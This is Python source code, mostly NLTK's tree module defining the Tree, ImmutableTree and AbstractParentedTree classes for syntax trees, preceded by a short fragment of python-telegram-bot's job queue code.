        """:class:`telegram.ext.JobQueue`: Optional. The ``JobQueue`` this job belongs to."""
        return self._job_queue
    @job_queue.setter
    def job_queue(self, job_queue):
        # Property setter for backward compatibility with JobQueue.put()
        if not self._job_queue:
            self._job_queue = weakref.proxy(job_queue)
        else:
            raise RuntimeError("The 'job_queue' attribute can only be set once.")
    def __lt__(self, other):
        # The JobQueue's PriorityQueue stores ``(timestamp, job)`` tuples;
        # when two timestamps are equal, tuple comparison falls back to
        # comparing the jobs.  Always reporting "not less than" keeps that
        # tie-break from raising without imposing any ordering.
        return False
| rogerscristo/BotFWD | env/lib/python3.6/site-packages/telegram/ext/jobqueue.py | Python | mit | 20,684 | 0.004448 |
# -*- coding: utf-8 -*-
# Natural Language Toolkit: Text Trees
#
# Copyright (C) 2001-2015 NLTK Project
# Author: Edward Loper <edloper@gmail.com>
# Steven Bird <stevenbird1@gmail.com>
# Peter Ljunglöf <peter.ljunglof@gu.se>
# Nathan Bodenstab <bodenstab@cslu.ogi.edu> (tree transforms)
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
"""
Class for representing hierarchical language structures, such as
syntax trees and morphological trees.
"""
from __future__ import print_function, unicode_literals
# TODO: add LabelledTree (can be used for dependency trees)
import re
from nltk.grammar import Production, Nonterminal
from nltk.probability import ProbabilisticMixIn
from nltk.util import slice_bounds
from nltk.compat import string_types, python_2_unicode_compatible, unicode_repr
from nltk.internals import raise_unorderable_types
######################################################################
## Trees
######################################################################
@python_2_unicode_compatible
class Tree(list):
"""
A Tree represents a hierarchical grouping of leaves and subtrees.
For example, each constituent in a syntax tree is represented by a single Tree.
A tree's children are encoded as a list of leaves and subtrees,
where a leaf is a basic (non-tree) value; and a subtree is a
nested Tree.
>>> from nltk.tree import Tree
>>> print(Tree(1, [2, Tree(3, [4]), 5]))
(1 2 (3 4) 5)
>>> vp = Tree('VP', [Tree('V', ['saw']),
... Tree('NP', ['him'])])
>>> s = Tree('S', [Tree('NP', ['I']), vp])
>>> print(s)
(S (NP I) (VP (V saw) (NP him)))
>>> print(s[1])
(VP (V saw) (NP him))
>>> print(s[1,1])
(NP him)
>>> t = Tree.fromstring("(S (NP I) (VP (V saw) (NP him)))")
>>> s == t
True
>>> t[1][1].set_label('X')
>>> t[1][1].label()
'X'
>>> print(t)
(S (NP I) (VP (V saw) (X him)))
>>> t[0], t[1,1] = t[1,1], t[0]
>>> print(t)
(S (X him) (VP (V saw) (NP I)))
The length of a tree is the number of children it has.
>>> len(t)
2
The set_label() and label() methods allow individual constituents
to be labeled. For example, syntax trees use this label to specify
phrase tags, such as "NP" and "VP".
Several Tree methods use "tree positions" to specify
children or descendants of a tree. Tree positions are defined as
follows:
- The tree position *i* specifies a Tree's *i*\ th child.
- The tree position ``()`` specifies the Tree itself.
- If *p* is the tree position of descendant *d*, then
*p+i* specifies the *i*\ th child of *d*.
I.e., every tree position is either a single index *i*,
specifying ``tree[i]``; or a sequence *i1, i2, ..., iN*,
specifying ``tree[i1][i2]...[iN]``.
Construct a new tree. This constructor can be called in one
of two ways:
- ``Tree(label, children)`` constructs a new tree with the
specified label and list of children.
- ``Tree.fromstring(s)`` constructs a new tree by parsing the string ``s``.
"""
def __init__(self, node, children=None):
if children is None:
raise TypeError("%s: Expected a node value and child list "
% type(self).__name__)
elif isinstance(children, string_types):
raise TypeError("%s() argument 2 should be a list, not a "
"string" % type(self).__name__)
else:
list.__init__(self, children)
self._label = node
#////////////////////////////////////////////////////////////
# Comparison operators
#////////////////////////////////////////////////////////////
def __eq__(self, other):
return (self.__class__ is other.__class__ and
(self._label, list(self)) == (other._label, list(other)))
def __lt__(self, other):
if not isinstance(other, Tree):
# raise_unorderable_types("<", self, other)
# Sometimes children can be pure strings,
# so we need to be able to compare with non-trees:
return self.__class__.__name__ < other.__class__.__name__
elif self.__class__ is other.__class__:
return (self._label, list(self)) < (other._label, list(other))
else:
return self.__class__.__name__ < other.__class__.__name__
# @total_ordering doesn't work here, since the class inherits from a builtin class
__ne__ = lambda self, other: not self == other
__gt__ = lambda self, other: not (self < other or self == other)
__le__ = lambda self, other: self < other or self == other
__ge__ = lambda self, other: not self < other
#////////////////////////////////////////////////////////////
# Disabled list operations
#////////////////////////////////////////////////////////////
    # ``list`` supports * and +, but repeating or concatenating trees would
    # yield a structure that is no longer a single tree, so the inherited
    # operators are disabled with explicit errors.
    def __mul__(self, v):
        raise TypeError('Tree does not support multiplication')
    def __rmul__(self, v):
        raise TypeError('Tree does not support multiplication')
    def __add__(self, v):
        raise TypeError('Tree does not support addition')
    def __radd__(self, v):
        raise TypeError('Tree does not support addition')
#////////////////////////////////////////////////////////////
# Indexing (with support for tree positions)
#////////////////////////////////////////////////////////////
def __getitem__(self, index):
if isinstance(index, (int, slice)):
return list.__getitem__(self, index)
elif isinstance(index, (list, tuple)):
if len(index) == 0:
return self
elif len(index) == 1:
return self[index[0]]
else:
return self[index[0]][index[1:]]
else:
raise TypeError("%s indices must be integers, not %s" %
(type(self).__name__, type(index).__name__))
def __setitem__(self, index, value):
if isinstance(index, (int, slice)):
return list.__setitem__(self, index, value)
elif isinstance(index, (list, tuple)):
if len(index) == 0:
raise IndexError('The tree position () may not be '
'assigned to.')
elif len(index) == 1:
self[index[0]] = value
else:
self[index[0]][index[1:]] = value
else:
raise TypeError("%s indices must be integers, not %s" %
(type(self).__name__, type(index).__name__))
def __delitem__(self, index):
if isinstance(index, (int, slice)):
return list.__delitem__(self, index)
elif isinstance(index, (list, tuple)):
if len(index) == 0:
raise IndexError('The tree position () may not be deleted.')
elif len(index) == 1:
del self[index[0]]
else:
del self[index[0]][index[1:]]
else:
raise TypeError("%s indices must be integers, not %s" %
(type(self).__name__, type(index).__name__))
#////////////////////////////////////////////////////////////
# Basic tree operations
#////////////////////////////////////////////////////////////
    def _get_node(self):
        """Outdated method to access the node value; use the label() method instead."""
        raise NotImplementedError("Use label() to access a node label.")
    def _set_node(self, value):
        """Outdated method to set the node value; use the set_label() method instead."""
        raise NotImplementedError("Use set_label() method to set a node label.")
    # Kept only so legacy code touching ``tree.node`` fails with a helpful
    # error message instead of a plain AttributeError.
    node = property(_get_node, _set_node)
    def label(self):
        """
        Return the node label of the tree.
        >>> t = Tree.fromstring('(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))')
        >>> t.label()
        'S'
        :return: the node label (typically a string)
        :rtype: any
        """
        # The label is stored in ``_label``, set at construction time and
        # replaceable via set_label().
        return self._label
    def set_label(self, label):
        """
        Set the node label of the tree.
        >>> t = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
        >>> t.set_label("T")
        >>> print(t)
        (T (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))
        :param label: the node label (typically a string)
        :type label: any
        """
        # No validation is performed here; productions() later requires the
        # label to be a string.
        self._label = label
def leaves(self):
"""
Return the leaves of the tree.
>>> t = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
>>> t.leaves()
['the', 'dog', 'chased', 'the', 'cat']
:return: a list containing this tree's leaves.
The order reflects the order of the
leaves in the tree's hierarchical structure.
:rtype: list
"""
leaves = []
for child in self:
if isinstance(child, Tree):
leaves.extend(child.leaves())
else:
leaves.append(child)
return leaves
    def flatten(self):
        """
        Return a flat version of the tree, with all non-root non-terminals removed.
        >>> t = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
        >>> print(t.flatten())
        (S the dog chased the cat)
        :return: a tree consisting of this tree's root connected directly to
            its leaves, omitting all intervening non-terminal nodes.
        :rtype: Tree
        """
        # The result keeps only the root label; its children are exactly
        # this tree's leaves, in order.
        return Tree(self.label(), self.leaves())
def height(self):
"""
Return the height of the tree.
>>> t = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
>>> t.height()
5
>>> print(t[0,0])
(D the)
>>> t[0,0].height()
2
:return: The height of this tree. The height of a tree
containing no children is 1; the height of a tree
containing only leaves is 2; and the height of any other
tree is one plus the maximum of its children's
heights.
:rtype: int
"""
max_child_height = 0
for child in self:
if isinstance(child, Tree):
max_child_height = max(max_child_height, child.height())
else:
max_child_height = max(max_child_height, 1)
return 1 + max_child_height
    def treepositions(self, order='preorder'):
        """
        >>> t = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
        >>> t.treepositions() # doctest: +ELLIPSIS
        [(), (0,), (0, 0), (0, 0, 0), (0, 1), (0, 1, 0), (1,), (1, 0), (1, 0, 0), ...]
        >>> for pos in t.treepositions('leaves'):
        ...     t[pos] = t[pos][::-1].upper()
        >>> print(t)
        (S (NP (D EHT) (N GOD)) (VP (V DESAHC) (NP (D EHT) (N TAC))))
        :param order: One of: ``preorder``, ``postorder``, ``bothorder``,
            ``leaves``.
        """
        positions = []
        # The root's own position () is emitted before children (preorder)
        # and/or after them (postorder); 'leaves' emits neither.
        if order in ('preorder', 'bothorder'): positions.append( () )
        for i, child in enumerate(self):
            if isinstance(child, Tree):
                childpos = child.treepositions(order)
                # Prefix each descendant position with this child's index.
                positions.extend((i,)+p for p in childpos)
            else:
                positions.append( (i,) )
        if order in ('postorder', 'bothorder'): positions.append( () )
        return positions
def subtrees(self, filter=None):
"""
Generate all the subtrees of this tree, optionally restricted
to trees matching the filter function.
>>> t = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
>>> for s in t.subtrees(lambda t: t.height() == 2):
... print(s)
(D the)
(N dog)
(V chased)
(D the)
(N cat)
:type filter: function
:param filter: the function to filter all local trees
"""
if not filter or filter(self):
yield self
for child in self:
if isinstance(child, Tree):
for subtree in child.subtrees(filter):
yield subtree
    def productions(self):
        """
        Generate the productions that correspond to the non-terminal nodes of the tree.
        For each subtree of the form (P: C1 C2 ... Cn) this produces a production of the
        form P -> C1 C2 ... Cn.
        >>> t = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
        >>> t.productions()
        [S -> NP VP, NP -> D N, D -> 'the', N -> 'dog', VP -> V NP, V -> 'chased',
        NP -> D N, D -> 'the', N -> 'cat']
        :rtype: list(Production)
        """
        if not isinstance(self._label, string_types):
            raise TypeError('Productions can only be generated from trees having node labels that are strings')
        # Root production first, then each child subtree's productions in
        # left-to-right (preorder) order.  ``_child_names`` is a
        # module-level helper (not shown in this excerpt).
        prods = [Production(Nonterminal(self._label), _child_names(self))]
        for child in self:
            if isinstance(child, Tree):
                prods += child.productions()
        return prods
def pos(self):
"""
Return a sequence of pos-tagged words extracted from the tree.
>>> t = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
>>> t.pos()
[('the', 'D'), ('dog', 'N'), ('chased', 'V'), ('the', 'D'), ('cat', 'N')]
:return: a list of tuples containing leaves and pre-terminals (part-of-speech tags).
The order reflects the order of the leaves in the tree's hierarchical structure.
:rtype: list(tuple)
"""
pos = []
for child in self:
if isinstance(child, Tree):
pos.extend(child.pos())
else:
pos.append((child, self._label))
return pos
    def leaf_treeposition(self, index):
        """
        :return: The tree position of the ``index``-th leaf in this
            tree.  I.e., if ``tp=self.leaf_treeposition(i)``, then
            ``self[tp]==self.leaves()[i]``.
        :raise IndexError: If this tree contains fewer than ``index+1``
            leaves, or if ``index<0``.
        """
        if index < 0: raise IndexError('index must be non-negative')
        # Depth-first search with an explicit stack of (value, position)
        # pairs.  Children are pushed in reverse so the leftmost child is
        # popped first, visiting leaves in left-to-right order.
        stack = [(self, ())]
        while stack:
            value, treepos = stack.pop()
            if not isinstance(value, Tree):
                # Count down through the leaves until the requested one.
                if index == 0: return treepos
                else: index -= 1
            else:
                for i in range(len(value)-1, -1, -1):
                    stack.append( (value[i], treepos+(i,)) )
        raise IndexError('index must be less than or equal to len(self)')
def treeposition_spanning_leaves(self, start, end):
"""
:return: The tree position of the lowest descendant of this
tree that dominates ``self.leaves()[start:end]``.
:raise ValueError: if ``end <= start``
"""
if end <= start:
raise ValueError('end must be greater than start')
# Find the tree positions of the start & end leaves, and
# take the longest common subsequence.
start_treepos = self.leaf_treeposition(start)
end_treepos = self.leaf_treeposition(end-1)
# Find the first index where they mismatch:
for i in range(len(start_treepos)):
if i == len(end_treepos) or start_treepos[i] != end_treepos[i]:
return start_treepos[:i]
return start_treepos
#////////////////////////////////////////////////////////////
# Transforms
#////////////////////////////////////////////////////////////
def chomsky_normal_form(self, factor="right", horzMarkov=None, vertMarkov=0, childChar="|", parentChar="^"):
"""
This method can modify a tree in three ways:
1. Convert a tree into its Chomsky Normal Form (CNF)
equivalent -- Every subtree has either two non-terminals
or one terminal as its children. This process requires
the creation of more"artificial" non-terminal nodes.
2. Markov (vertical) smoothing of children in new artificial
nodes
3. Horizontal (parent) annotation of nodes
:param factor: Right or left factoring method (default = "right")
:type factor: str = [left|right]
:param horzMarkov: Markov order for sibling smoothing in artificial nodes (None (default) = include all siblings)
:type horzMarkov: int | None
:param vertMarkov: Markov order for parent smoothing (0 (default) = no vertical annotation)
:type vertMarkov: int | None
:param childChar: A string used in construction of the artificial nodes, separating the head of the
original subtree from the child nodes that have yet to be expanded (default = "|")
:type childChar: str
:param parentChar: A string used to separate the node representation from its vertical annotation
:type parentChar: str
"""
from nltk.treetransforms import chomsky_normal_form
chomsky_normal_form(self, factor, horzMarkov, vertMarkov, childChar, parentChar)
def un_chomsky_normal_form(self, expandUnary = True, childChar = "|", parentChar = "^", unaryChar = "+"):
"""
This method modifies the tree in three ways:
1. Transforms a tree in Chomsky Normal Form back to its
original structure (branching greater than two)
2. Removes any parent annotation (if it exists)
3. (optional) expands unary subtrees (if previously
collapsed with collapseUnary(...) )
:param expandUnary: Flag to expand unary or not (default = True)
:type expandUnary: bool
:param childChar: A string separating the head node from its children in an artificial node (default = "|")
:type childChar: str
:param parentChar: A sting separating the node label from its parent annotation (default = "^")
:type parentChar: str
:param unaryChar: A string joining two non-terminals in a unary production (default = "+")
:type unaryChar: str
"""
from nltk.treetransforms import un_chomsky_normal_form
un_chomsky_normal_form(self, expandUnary, childChar, parentChar, unaryChar)
def collapse_unary(self, collapsePOS = False, collapseRoot = False, joinChar = "+"):
"""
Collapse subtrees with a single child (ie. unary productions)
into a new non-terminal (Tree node) joined by 'joinChar'.
This is useful when working with algorithms that do not allow
unary productions, and completely removing the unary productions
would require loss of useful information. The Tree is modified
directly (since it is passed by reference) and no value is returned.
:param collapsePOS: 'False' (default) will not collapse the parent of leaf nodes (ie.
Part-of-Speech tags) since they are always unary productions
:type collapsePOS: bool
:param collapseRoot: 'False' (default) will not modify the root production
if it is unary. For the Penn WSJ treebank corpus, this corresponds
to the TOP -> productions.
:type collapseRoot: bool
:param joinChar: A string used to connect collapsed node values (default = "+")
:type joinChar: str
"""
from nltk.treetransforms import collapse_unary
collapse_unary(self, collapsePOS, collapseRoot, joinChar)
#////////////////////////////////////////////////////////////
# Convert, copy
#////////////////////////////////////////////////////////////
@classmethod
def convert(cls, tree):
"""
Convert a tree between different subtypes of Tree. ``cls`` determines
which class will be used to encode the new tree.
:type tree: Tree
:param tree: The tree that should be converted.
:return: The new Tree.
"""
if isinstance(tree, Tree):
children = [cls.convert(child) for child in tree]
return cls(tree._label, children)
else:
return tree
def copy(self, deep=False):
if not deep: return type(self)(self._label, self)
else: return type(self).convert(self)
def _frozen_class(self): return ImmutableTree
def freeze(self, leaf_freezer=None):
frozen_class = self._frozen_class()
if leaf_freezer is None:
newcopy = frozen_class.convert(self)
else:
newcopy = self.copy(deep=True)
for pos in newcopy.treepositions('leaves'):
newcopy[pos] = leaf_freezer(newcopy[pos])
newcopy = frozen_class.convert(newcopy)
hash(newcopy) # Make sure the leaves are hashable.
return newcopy
#////////////////////////////////////////////////////////////
# Parsing
#////////////////////////////////////////////////////////////
@classmethod
def fromstring(cls, s, brackets='()', read_node=None, read_leaf=None,
node_pattern=None, leaf_pattern=None,
remove_empty_top_bracketing=False):
"""
Read a bracketed tree string and return the resulting tree.
Trees are represented as nested brackettings, such as::
(S (NP (NNP John)) (VP (V runs)))
:type s: str
:param s: The string to read
:type brackets: str (length=2)
:param brackets: The bracket characters used to mark the
beginning and end of trees and subtrees.
:type read_node: function
:type read_leaf: function
:param read_node, read_leaf: If specified, these functions
are applied to the substrings of ``s`` corresponding to
nodes and leaves (respectively) to obtain the values for
those nodes and leaves. They should have the following
signature:
read_node(str) -> value
For example, these functions could be used to process nodes
and leaves whose values should be some type other than
string (such as ``FeatStruct``).
Note that by default, node strings and leaf strings are
delimited by whitespace and brackets; to override this
default, use the ``node_pattern`` and ``leaf_pattern``
arguments.
:type node_pattern: str
:type leaf_pattern: str
:param node_pattern, leaf_pattern: Regular expression patterns
used to find node and leaf substrings in ``s``. By
default, both nodes patterns are defined to match any
sequence of non-whitespace non-bracket characters.
:type remove_empty_top_bracketing: bool
:param remove_empty_top_bracketing: If the resulting tree has
an empty node label, and is length one, then return its
single child instead. This is useful for treebank trees,
which sometimes contain an extra level of bracketing.
:return: A tree corresponding to the string representation ``s``.
If this class method is called using a subclass of Tree,
then it will return a tree of that type.
:rtype: Tree
"""
if not isinstance(brackets, string_types) or len(brackets) != 2:
raise TypeError('brackets must be a length-2 string')
if re.search('\s', brackets):
raise TypeError('whitespace brackets not allowed')
# Construct a regexp that will tokenize the string.
open_b, close_b = brackets
open_pattern, close_pattern = (re.escape(open_b), re.escape(close_b))
if node_pattern is None:
node_pattern = '[^\s%s%s]+' % (open_pattern, close_pattern)
if leaf_pattern is None:
leaf_pattern = '[^\s%s%s]+' % (open_pattern, close_pattern)
token_re = re.compile('%s\s*(%s)?|%s|(%s)' % (
open_pattern, node_pattern, close_pattern, leaf_pattern))
# Walk through each token, updating a stack of trees.
stack = [(None, [])] # list of (node, children) tuples
for match in token_re.finditer(s):
token = match.group()
# Beginning of a tree/subtree
if token[0] == open_b:
if len(stack) == 1 and len(stack[0][1]) > 0:
cls._parse_error(s, match, 'end-of-string')
label = token[1:].lstrip()
if read_node is not None: label = read_node(label)
stack.append((label, []))
# End of a tree/subtree
elif token == close_b:
if len(stack) == 1:
if len(stack[0][1]) == 0:
cls._parse_error(s, match, open_b)
else:
cls._parse_error(s, match, 'end-of-string')
label, children = stack.pop()
stack[-1][1].append(cls(label, children))
# Leaf node
else:
if len(stack) == 1:
cls._parse_error(s, match, open_b)
if read_leaf is not None: token = read_leaf(token)
stack[-1][1].append(token)
# check that we got exactly one complete tree.
if len(stack) > 1:
cls._parse_error(s, 'end-of-string', close_b)
elif len(stack[0][1]) == 0:
cls._parse_error(s, 'end-of-string', open_b)
else:
assert stack[0][0] is None
assert len(stack[0][1]) == 1
tree = stack[0][1][0]
# If the tree has an extra level with node='', then get rid of
# it. E.g.: "((S (NP ...) (VP ...)))"
if remove_empty_top_bracketing and tree._label == '' and len(tree) == 1:
tree = tree[0]
# return the tree.
return tree
    @classmethod
    def _parse_error(cls, s, match, expecting):
        """
        Display a friendly error message when parsing a tree string fails.

        :param s: The string we're parsing.
        :param match: regexp match of the problem token, or the literal
            string 'end-of-string' if the input ended unexpectedly.
        :param expecting: what we expected to see instead.
        :raise ValueError: always; the message pinpoints the bad token.
        """
        # Construct a basic error message
        if match == 'end-of-string':
            pos, token = len(s), 'end-of-string'
        else:
            pos, token = match.start(), match.group()
        msg = '%s.read(): expected %r but got %r\n%sat index %d.' % (
            cls.__name__, expecting, token, ' '*12, pos)
        # Add a display showing the error token itself:
        s = s.replace('\n', ' ').replace('\t', ' ')
        offset = pos
        # Truncate the display to ~10 chars of context on each side of
        # the problem position, adjusting the caret offset to match.
        if len(s) > pos+10:
            s = s[:pos+10]+'...'
        if pos > 10:
            s = '...'+s[pos-10:]
            offset = 13
        msg += '\n%s"%s"\n%s^' % (' '*16, s, ' '*(17+offset))
        raise ValueError(msg)
#////////////////////////////////////////////////////////////
# Visualization & String Representation
#////////////////////////////////////////////////////////////
def draw(self):
"""
Open a new window containing a graphical diagram of this tree.
"""
from nltk.draw.tree import draw_trees
draw_trees(self)
def pretty_print(self, sentence=None, highlight=(), stream=None, **kwargs):
"""
Pretty-print this tree as ASCII or Unicode art.
For explanation of the arguments, see the documentation for
`nltk.treeprettyprinter.TreePrettyPrinter`.
"""
from nltk.treeprettyprinter import TreePrettyPrinter
print(TreePrettyPrinter(self, sentence, highlight).text(**kwargs),
file=stream)
def __repr__(self):
childstr = ", ".join(unicode_repr(c) for c in self)
return '%s(%s, [%s])' % (type(self).__name__, unicode_repr(self._label), childstr)
    def _repr_png_(self):
        """
        Draws and outputs in PNG for ipython.
        PNG is used instead of PDF, since it can be displayed in the qt console and
        has wider browser support.
        """
        import os
        import base64
        import subprocess
        import tempfile
        from nltk.draw.tree import tree_to_treesegment
        from nltk.draw.util import CanvasFrame
        from nltk.internals import find_binary
        # Render the tree onto an (offscreen) Tk canvas.
        _canvas_frame = CanvasFrame()
        widget = tree_to_treesegment(_canvas_frame.canvas(), self)
        _canvas_frame.add_widget(widget)
        x, y, w, h = widget.bbox()
        # print_to_file uses scrollregion to set the width and height of the pdf.
        _canvas_frame.canvas()['scrollregion'] = (0, 0, w, h)
        # Write PostScript to a temp file, then convert it to PNG via
        # Ghostscript ('gs'; gswin32c/gswin64c on Windows).
        with tempfile.NamedTemporaryFile() as file:
            in_path = '{0:}.ps'.format(file.name)
            out_path = '{0:}.png'.format(file.name)
            _canvas_frame.print_to_file(in_path)
            _canvas_frame.destroy_widget(widget)
            subprocess.call([find_binary('gs', binary_names=['gswin32c.exe', 'gswin64c.exe'], env_vars=['PATH'], verbose=False)] +
                            '-q -dEPSCrop -sDEVICE=png16m -r90 -dTextAlphaBits=4 -dGraphicsAlphaBits=4 -dSAFER -dBATCH -dNOPAUSE -sOutputFile={0:} {1:}'
                            .format(out_path, in_path).split())
            with open(out_path, 'rb') as sr:
                res = sr.read()
            # Clean up both temp artifacts before returning.
            os.remove(in_path)
            os.remove(out_path)
            # IPython expects base64-encoded PNG data as a str.
            return base64.b64encode(res).decode()
    def __str__(self):
        # Delegate to pformat() for the bracketed string representation.
        return self.pformat()
def pprint(self, **kwargs):
"""
Print a string representation of this Tree to 'stream'
"""
if "stream" in kwargs:
stream = kwargs["stream"]
del kwargs["stream"]
else:
stream = None
print(self.pformat(**kwargs), file=stream)
    def pformat(self, margin=70, indent=0, nodesep='', parens='()', quotes=False):
        """
        :return: A pretty-printed string representation of this tree.
        :rtype: str
        :param margin: The right margin at which to do line-wrapping.
        :type margin: int
        :param indent: The indentation level at which printing
            begins.  This number is used to decide how far to indent
            subsequent lines.
        :type indent: int
        :param nodesep: A string that is used to separate the node
            from the children.  E.g., passing ``':'`` gives trees like
            ``(S: (NP: I) (VP: (V: saw) (NP: it)))``; the default is
            the empty string.
        :param parens: A length-2 string giving the opening and closing
            bracket characters (default ``'()'``).
        :param quotes: If true, leaf strings are rendered with repr()
            quoting; if false (default), they are printed bare.
        """
        # Try writing it on one line.
        s = self._pformat_flat(nodesep, parens, quotes)
        if len(s) + indent < margin:
            return s
        # If it doesn't fit on one line, then write it on multi-lines.
        if isinstance(self._label, string_types):
            s = '%s%s%s' % (parens[0], self._label, nodesep)
        else:
            s = '%s%s%s' % (parens[0], unicode_repr(self._label), nodesep)
        for child in self:
            if isinstance(child, Tree):
                # Subtrees recurse with two extra columns of indentation.
                s += '\n'+' '*(indent+2)+child.pformat(margin, indent+2,
                                                  nodesep, parens, quotes)
            elif isinstance(child, tuple):
                # Tuples (e.g. tagged words) are rendered as word/tag.
                s += '\n'+' '*(indent+2)+ "/".join(child)
            elif isinstance(child, string_types) and not quotes:
                s += '\n'+' '*(indent+2)+ '%s' % child
            else:
                s += '\n'+' '*(indent+2)+ unicode_repr(child)
        return s+parens[1]
def pformat_latex_qtree(self):
r"""
Returns a representation of the tree compatible with the
LaTeX qtree package. This consists of the string ``\Tree``
followed by the tree represented in bracketed notation.
For example, the following result was generated from a parse tree of
the sentence ``The announcement astounded us``::
\Tree [.I'' [.N'' [.D The ] [.N' [.N announcement ] ] ]
[.I' [.V'' [.V' [.V astounded ] [.N'' [.N' [.N us ] ] ] ] ] ] ]
See http://www.ling.upenn.edu/advice/latex.html for the LaTeX
style file for the qtree package.
:return: A latex qtree representation of this tree.
:rtype: str
"""
reserved_chars = re.compile('([#\$%&~_\{\}])')
pformat = self.pformat(indent=6, nodesep='', parens=('[.', ' ]'))
return r'\Tree ' + re.sub(reserved_chars, r'\\\1', pformat)
def _pformat_flat(self, nodesep, parens, quotes):
childstrs = []
for child in self:
if isinstance(child, Tree):
childstrs.append(child._pformat_flat(nodesep, parens, quotes))
elif isinstance(child, tuple):
childstrs.append("/".join(child))
elif isinstance(child, string_types) and not quotes:
childstrs.append('%s' % child)
else:
childstrs.append(unicode_repr(child))
if isinstance(self._label, string_types):
return '%s%s%s %s%s' % (parens[0], self._label, nodesep,
" ".join(childstrs), parens[1])
else:
return '%s%s%s %s%s' % (parens[0], unicode_repr(self._label), nodesep,
" ".join(childstrs), parens[1])
class ImmutableTree(Tree):
    """
    A hashable tree whose structure may not be changed after creation.
    Every mutating operation inherited from ``list``/``Tree`` raises
    ``ValueError``.
    """
    def __init__(self, node, children=None):
        super(ImmutableTree, self).__init__(node, children)
        # Precompute our hash value.  This ensures that we're really
        # immutable.  It also means we only have to calculate it once.
        try:
            self._hash = hash((self._label, tuple(self)))
        except (TypeError, ValueError):
            raise ValueError("%s: node value and children "
                             "must be immutable" % type(self).__name__)
    def _modification_error(self):
        # Single shared error path for every mutating operation.
        raise ValueError('%s may not be modified' % type(self).__name__)
    def __setitem__(self, index, value):
        self._modification_error()
    def __setslice__(self, i, j, value):
        self._modification_error()
    def __delitem__(self, index):
        self._modification_error()
    def __delslice__(self, i, j):
        self._modification_error()
    def __iadd__(self, other):
        self._modification_error()
    def __imul__(self, other):
        self._modification_error()
    def append(self, v):
        self._modification_error()
    def extend(self, v):
        self._modification_error()
    def pop(self, v=None):
        self._modification_error()
    def remove(self, v):
        self._modification_error()
    def reverse(self):
        self._modification_error()
    def sort(self):
        self._modification_error()
    def __hash__(self):
        return self._hash
    def set_label(self, value):
        """
        Set the node label.  This will only succeed the first time the
        node label is set, which should occur in ImmutableTree.__init__().
        """
        if hasattr(self, '_label'):
            self._modification_error()
        self._label = value
######################################################################
## Parented trees
######################################################################
class AbstractParentedTree(Tree):
    """
    An abstract base class for a ``Tree`` that automatically maintains
    pointers to parent nodes.  These parent pointers are updated
    whenever any change is made to a tree's structure.  Two subclasses
    are currently defined:

      - ``ParentedTree`` is used for tree structures where each subtree
        has at most one parent.  This class should be used in cases
        where there is no "sharing" of subtrees.

      - ``MultiParentedTree`` is used for tree structures where a
        subtree may have zero or more parents.  This class should be
        used in cases where subtrees may be shared.

    Subclassing
    ===========
    The ``AbstractParentedTree`` class redefines all operations that
    modify a tree's structure to call two methods, which are used by
    subclasses to update parent information:

      - ``_setparent()`` is called whenever a new child is added.
      - ``_delparent()`` is called whenever a child is removed.
    """
    def __init__(self, node, children=None):
        super(AbstractParentedTree, self).__init__(node, children)
        # If children is None, the tree is read from node, and
        # all parents will be set during parsing.
        if children is not None:
            # Otherwise we have to set the parent of the children.
            # Iterate over self, and *not* children, because children
            # might be an iterator.
            # First pass is a dry run so that no parent pointers are
            # modified if any child turns out to be invalid.
            for i, child in enumerate(self):
                if isinstance(child, Tree):
                    self._setparent(child, i, dry_run=True)
            for i, child in enumerate(self):
                if isinstance(child, Tree):
                    self._setparent(child, i)
    #////////////////////////////////////////////////////////////
    # Parent management
    #////////////////////////////////////////////////////////////
    def _setparent(self, child, index, dry_run=False):
        """
        Update the parent pointer of ``child`` to point to ``self``.  This
        method is only called if the type of ``child`` is ``Tree``;
        i.e., it is not called when adding a leaf to a tree.  This method
        is always called before the child is actually added to the
        child list of ``self``.

        :type child: Tree
        :type index: int
        :param index: The index of ``child`` in ``self``.
        :raise TypeError: If ``child`` is a tree with an impropriate
            type.  Typically, if ``child`` is a tree, then its type needs
            to match the type of ``self``.  This prevents mixing of
            different tree types (single-parented, multi-parented, and
            non-parented).
        :param dry_run: If true, then don't actually set the child's
            parent pointer; just check for any error conditions, and
            raise an exception if one is found.
        """
        raise NotImplementedError()
    def _delparent(self, child, index):
        """
        Update the parent pointer of ``child`` to not point to self.  This
        method is only called if the type of ``child`` is ``Tree``; i.e., it
        is not called when removing a leaf from a tree.  This method
        is always called before the child is actually removed from the
        child list of ``self``.

        :type child: Tree
        :type index: int
        :param index: The index of ``child`` in ``self``.
        """
        raise NotImplementedError()
    #////////////////////////////////////////////////////////////
    # Methods that add/remove children
    #////////////////////////////////////////////////////////////
    # Every method that adds or removes a child must make
    # appropriate calls to _setparent() and _delparent().
    def __delitem__(self, index):
        # del ptree[start:stop]
        if isinstance(index, slice):
            start, stop, step = slice_bounds(self, index, allow_step=True)
            # Clear all the children pointers.
            for i in range(start, stop, step):
                if isinstance(self[i], Tree):
                    self._delparent(self[i], i)
            # Delete the children from our child list.
            super(AbstractParentedTree, self).__delitem__(index)
        # del ptree[i]
        elif isinstance(index, int):
            if index < 0: index += len(self)
            if index < 0: raise IndexError('index out of range')
            # Clear the child's parent pointer.
            if isinstance(self[index], Tree):
                self._delparent(self[index], index)
            # Remove the child from our child list.
            super(AbstractParentedTree, self).__delitem__(index)
        elif isinstance(index, (list, tuple)):
            # del ptree[()]
            if len(index) == 0:
                raise IndexError('The tree position () may not be deleted.')
            # del ptree[(i,)]
            elif len(index) == 1:
                del self[index[0]]
            # del ptree[i1, i2, i3]: recurse into the subtree at i1.
            else:
                del self[index[0]][index[1:]]
        else:
            raise TypeError("%s indices must be integers, not %s" %
                            (type(self).__name__, type(index).__name__))
